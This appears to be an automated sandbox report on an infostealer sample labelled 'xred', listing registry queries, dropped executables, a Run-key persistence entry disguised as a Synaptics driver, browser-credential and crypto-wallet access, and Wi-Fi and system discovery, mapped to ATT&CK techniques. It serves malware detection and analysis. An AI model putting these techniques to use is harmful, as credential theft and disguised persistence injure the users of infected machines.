xred | b348bbc6e7e76bfdaf053e6df3eb41f5dddce5049cdbda65c1b7386fcc183392

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	._cache_RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	BoostTool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe

Clipboard Data 1 TTPs 8 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
6120	cmd.exe
5024	powershell.exe
3720	cmd.exe
4380	powershell.exe
5864	cmd.exe
700	powershell.exe
1256	cmd.exe
2592	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
656	RuntimeBroker.exe
4172	RuntimeBroker.exe
3356	._cache_RuntimeBroker.exe
1916	Synaptics.exe
4784	._cache_RuntimeBroker.exe
3716	RuntimeBroker.exe
1092	RuntimeBroker.exe
3260	._cache_RuntimeBroker.exe
2064	RuntimeBroker.exe
2824	RuntimeBroker.exe
1368	._cache_RuntimeBroker.exe
400	._cache_RuntimeBroker.exe
1804	._cache_RuntimeBroker.exe
852	RuntimeBroker.exe
4552	RuntimeBroker.exe
3012	._cache_RuntimeBroker.exe
1520	RuntimeBroker.exe
4940	._cache_RuntimeBroker.exe
3624	._cache_RuntimeBroker.exe
2736	RuntimeBroker.exe
1352	RuntimeBroker.exe
4592	RuntimeBroker.exe
4724	RuntimeBroker.exe
3276	._cache_RuntimeBroker.exe
4108	._cache_RuntimeBroker.exe
3044	._cache_RuntimeBroker.exe
3764	._cache_RuntimeBroker.exe
1952	RuntimeBroker.exe
2292	RuntimeBroker.exe
1940	._cache_RuntimeBroker.exe
2524	._cache_RuntimeBroker.exe
3640	RuntimeBroker.exe
4800	RuntimeBroker.exe
4504	RuntimeBroker.exe
3828	RuntimeBroker.exe
1360	RuntimeBroker.exe
1308	RuntimeBroker.exe
2324	RuntimeBroker.exe
5472	RuntimeBroker.exe
2336	RuntimeBroker.exe
5852	RuntimeBroker.exe
1368	RuntimeBroker.exe
5316	RuntimeBroker.exe
4728	rar.exe
5896	RuntimeBroker.exe
5580	RuntimeBroker.exe
5860	RuntimeBroker.exe
3444	RuntimeBroker.exe
1388	RuntimeBroker.exe
5468	RuntimeBroker.exe
5384	RuntimeBroker.exe
1524	RuntimeBroker.exe
5548	RuntimeBroker.exe
5588	RuntimeBroker.exe
3832	RuntimeBroker.exe
4260	RuntimeBroker.exe
3588	rar.exe
5196	RuntimeBroker.exe
720	RuntimeBroker.exe
5924	RuntimeBroker.exe
2748	RuntimeBroker.exe
2492	RuntimeBroker.exe
4724	RuntimeBroker.exe
4508	RuntimeBroker.exe

Loads dropped DLL 64 IoCs

pid	Process
4172	RuntimeBroker.exe
4172	RuntimeBroker.exe
3716	RuntimeBroker.exe
3716	RuntimeBroker.exe
1092	RuntimeBroker.exe
1092	RuntimeBroker.exe
2064	RuntimeBroker.exe
2064	RuntimeBroker.exe
2824	RuntimeBroker.exe
2824	RuntimeBroker.exe
852	RuntimeBroker.exe
852	RuntimeBroker.exe
4552	RuntimeBroker.exe
4552	RuntimeBroker.exe
1520	RuntimeBroker.exe
1520	RuntimeBroker.exe
1352	RuntimeBroker.exe
1352	RuntimeBroker.exe
2736	RuntimeBroker.exe
2736	RuntimeBroker.exe
4592	RuntimeBroker.exe
4592	RuntimeBroker.exe
4724	RuntimeBroker.exe
4724	RuntimeBroker.exe
1952	RuntimeBroker.exe
1952	RuntimeBroker.exe
2292	RuntimeBroker.exe
2292	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
4800	RuntimeBroker.exe
1308	RuntimeBroker.exe
1308	RuntimeBroker.exe
1308	RuntimeBroker.exe
1308	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe
3828	RuntimeBroker.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	RuntimeBroker.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 12 IoCs

persistence privilege_escalation

Process Discovery

T1057

pid	Process
4100	tasklist.exe
1904	tasklist.exe
2336	tasklist.exe
5852	tasklist.exe
1728	tasklist.exe
5420	tasklist.exe
3912	tasklist.exe
4696	tasklist.exe
3904	tasklist.exe
6100	tasklist.exe
5288	tasklist.exe
5884	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4156	cmd.exe
3400	cmd.exe
6140	cmd.exe
1156	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4800-328-0x00007FFF47E40000-0x00007FFF482A6000-memory.dmp	upx
behavioral2/memory/4800-329-0x00007FFF4B4C0000-0x00007FFF4B4E4000-memory.dmp	upx
behavioral2/memory/4800-330-0x00007FFF5E2F0000-0x00007FFF5E2FF000-memory.dmp	upx
behavioral2/memory/4800-356-0x00007FFF48320000-0x00007FFF4834C000-memory.dmp	upx
behavioral2/memory/3828-360-0x00007FFF47620000-0x00007FFF47A86000-memory.dmp	upx
behavioral2/memory/4800-359-0x00007FFF47A90000-0x00007FFF47C0A000-memory.dmp	upx
behavioral2/memory/4800-364-0x00007FFF475B0000-0x00007FFF475DE000-memory.dmp	upx
behavioral2/memory/4800-363-0x00007FFF5E2E0000-0x00007FFF5E2ED000-memory.dmp	upx
behavioral2/memory/4800-366-0x00007FFF3F300000-0x00007FFF3F679000-memory.dmp	upx
behavioral2/memory/4800-371-0x00007FFF4B4C0000-0x00007FFF4B4E4000-memory.dmp	upx
behavioral2/memory/4800-372-0x00007FFF4F970000-0x00007FFF4F985000-memory.dmp	upx
behavioral2/memory/4800-374-0x00007FFF5DD00000-0x00007FFF5DD0D000-memory.dmp	upx
behavioral2/memory/4800-379-0x00007FFF422E0000-0x00007FFF423F8000-memory.dmp	upx
behavioral2/memory/3828-378-0x00007FFF47620000-0x00007FFF47A86000-memory.dmp	upx
behavioral2/memory/1308-401-0x00007FFF3EE90000-0x00007FFF3F2F6000-memory.dmp	upx
behavioral2/memory/4800-377-0x00007FFF47A90000-0x00007FFF47C0A000-memory.dmp	upx
behavioral2/memory/4800-373-0x00007FFF4B3C0000-0x00007FFF4B3DF000-memory.dmp	upx
behavioral2/memory/3828-370-0x00007FFF5E240000-0x00007FFF5E24F000-memory.dmp	upx
behavioral2/memory/3828-369-0x00007FFF474C0000-0x00007FFF474E4000-memory.dmp	upx
behavioral2/memory/4800-368-0x00007FFF47E40000-0x00007FFF482A6000-memory.dmp	upx
behavioral2/memory/4800-365-0x00007FFF474F0000-0x00007FFF475A8000-memory.dmp	upx
behavioral2/memory/4800-362-0x00007FFF475E0000-0x00007FFF475F9000-memory.dmp	upx
behavioral2/memory/4800-358-0x00007FFF4B3C0000-0x00007FFF4B3DF000-memory.dmp	upx
behavioral2/memory/4800-357-0x00007FFF4B4A0000-0x00007FFF4B4B8000-memory.dmp	upx
behavioral2/memory/1308-406-0x00007FFF5DC90000-0x00007FFF5DC9F000-memory.dmp	upx
behavioral2/memory/4800-405-0x00007FFF475B0000-0x00007FFF475DE000-memory.dmp	upx
behavioral2/memory/1308-403-0x00007FFF47E10000-0x00007FFF47E34000-memory.dmp	upx
behavioral2/memory/4800-402-0x00007FFF475E0000-0x00007FFF475F9000-memory.dmp	upx
behavioral2/memory/3828-416-0x00007FFF47C20000-0x00007FFF47D9A000-memory.dmp	upx
behavioral2/memory/3828-421-0x00007FFF40A00000-0x00007FFF40D79000-memory.dmp	upx
behavioral2/memory/3828-420-0x00007FFF470F0000-0x00007FFF471A8000-memory.dmp	upx
behavioral2/memory/3828-419-0x00007FFF47470000-0x00007FFF4749E000-memory.dmp	upx
behavioral2/memory/3828-418-0x00007FFF5D8B0000-0x00007FFF5D8BD000-memory.dmp	upx
behavioral2/memory/3828-417-0x00007FFF474A0000-0x00007FFF474B9000-memory.dmp	upx
behavioral2/memory/3828-415-0x00007FFF47DA0000-0x00007FFF47DBF000-memory.dmp	upx
behavioral2/memory/3828-414-0x00007FFF47DC0000-0x00007FFF47DD8000-memory.dmp	upx
behavioral2/memory/3828-413-0x00007FFF47DE0000-0x00007FFF47E0C000-memory.dmp	upx
behavioral2/memory/4800-412-0x00007FFF3F300000-0x00007FFF3F679000-memory.dmp	upx
behavioral2/memory/4800-411-0x00007FFF474F0000-0x00007FFF475A8000-memory.dmp	upx
behavioral2/memory/1308-481-0x00007FFF42160000-0x00007FFF422DA000-memory.dmp	upx
behavioral2/memory/3828-480-0x00007FFF5D8B0000-0x00007FFF5D8BD000-memory.dmp	upx
behavioral2/memory/3828-479-0x00007FFF47DA0000-0x00007FFF47DBF000-memory.dmp	upx
behavioral2/memory/3828-478-0x00007FFF47620000-0x00007FFF47A86000-memory.dmp	upx
behavioral2/memory/1308-505-0x00007FFF47710000-0x00007FFF47A89000-memory.dmp	upx
behavioral2/memory/1308-506-0x00007FFF47CB0000-0x00007FFF47D68000-memory.dmp	upx
behavioral2/memory/1308-504-0x00007FFF47D70000-0x00007FFF47D9E000-memory.dmp	upx
behavioral2/memory/1308-520-0x00007FFF47CB0000-0x00007FFF47D68000-memory.dmp	upx
behavioral2/memory/1308-522-0x00007FFF4D190000-0x00007FFF4D19D000-memory.dmp	upx
behavioral2/memory/1308-521-0x00007FFF47C70000-0x00007FFF47C85000-memory.dmp	upx
behavioral2/memory/1308-519-0x00007FFF47710000-0x00007FFF47A89000-memory.dmp	upx
behavioral2/memory/1308-518-0x00007FFF47D70000-0x00007FFF47D9E000-memory.dmp	upx
behavioral2/memory/1308-517-0x00007FFF58CC0000-0x00007FFF58CCD000-memory.dmp	upx
behavioral2/memory/1308-516-0x00007FFF47DA0000-0x00007FFF47DB9000-memory.dmp	upx
behavioral2/memory/1308-515-0x00007FFF42160000-0x00007FFF422DA000-memory.dmp	upx
behavioral2/memory/1308-514-0x00007FFF46CD0000-0x00007FFF46CEF000-memory.dmp	upx
behavioral2/memory/1308-513-0x00007FFF47400000-0x00007FFF47418000-memory.dmp	upx
behavioral2/memory/1308-512-0x00007FFF47420000-0x00007FFF4744C000-memory.dmp	upx
behavioral2/memory/1308-511-0x00007FFF5DC90000-0x00007FFF5DC9F000-memory.dmp	upx
behavioral2/memory/1308-510-0x00007FFF47E10000-0x00007FFF47E34000-memory.dmp	upx
behavioral2/memory/1308-509-0x00007FFF3EE90000-0x00007FFF3F2F6000-memory.dmp	upx
behavioral2/memory/1308-508-0x00007FFF4D190000-0x00007FFF4D19D000-memory.dmp	upx
behavioral2/memory/1308-507-0x00007FFF47C70000-0x00007FFF47C85000-memory.dmp	upx
behavioral2/memory/1308-503-0x00007FFF58CC0000-0x00007FFF58CCD000-memory.dmp	upx
behavioral2/memory/1308-502-0x00007FFF47DA0000-0x00007FFF47DB9000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
2524	PING.EXE
3588	cmd.exe
6084	PING.EXE
1508	cmd.exe
3476	PING.EXE
5552	cmd.exe
5944	PING.EXE
1692	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
5572	netsh.exe
5116	cmd.exe
5152	netsh.exe
6048	cmd.exe
5836	netsh.exe
3276	cmd.exe
4404	netsh.exe
1520	cmd.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
2512	WMIC.exe
5532	WMIC.exe
420	WMIC.exe
2824	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Gathers system information 1 TTPs 4 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
5172	systeminfo.exe
5856	systeminfo.exe
4600	systeminfo.exe
1596	systeminfo.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
2524	PING.EXE
6084	PING.EXE
3476	PING.EXE
5944	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1076	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4816	WMIC.exe
4816	WMIC.exe
4816	WMIC.exe
4816	WMIC.exe
4380	powershell.exe
4380	powershell.exe
4332	powershell.exe
4332	powershell.exe
3424	powershell.exe
3424	powershell.exe
5144	powershell.exe
5144	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
4380	powershell.exe
5144	powershell.exe
3424	powershell.exe
4332	powershell.exe
6020	powershell.exe
6020	powershell.exe
6020	powershell.exe
5880	powershell.exe
5880	powershell.exe
5880	powershell.exe
1784	WMIC.exe
1784	WMIC.exe
1784	WMIC.exe
1784	WMIC.exe
1408	WMIC.exe
1408	WMIC.exe
1408	WMIC.exe
1408	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
6004	powershell.exe
6004	powershell.exe
6004	powershell.exe
2512	WMIC.exe
2512	WMIC.exe
2512	WMIC.exe
2512	WMIC.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
3264	powershell.exe
3264	powershell.exe
5740	powershell.exe
5740	powershell.exe
5912	powershell.exe
5912	powershell.exe
3264	powershell.exe
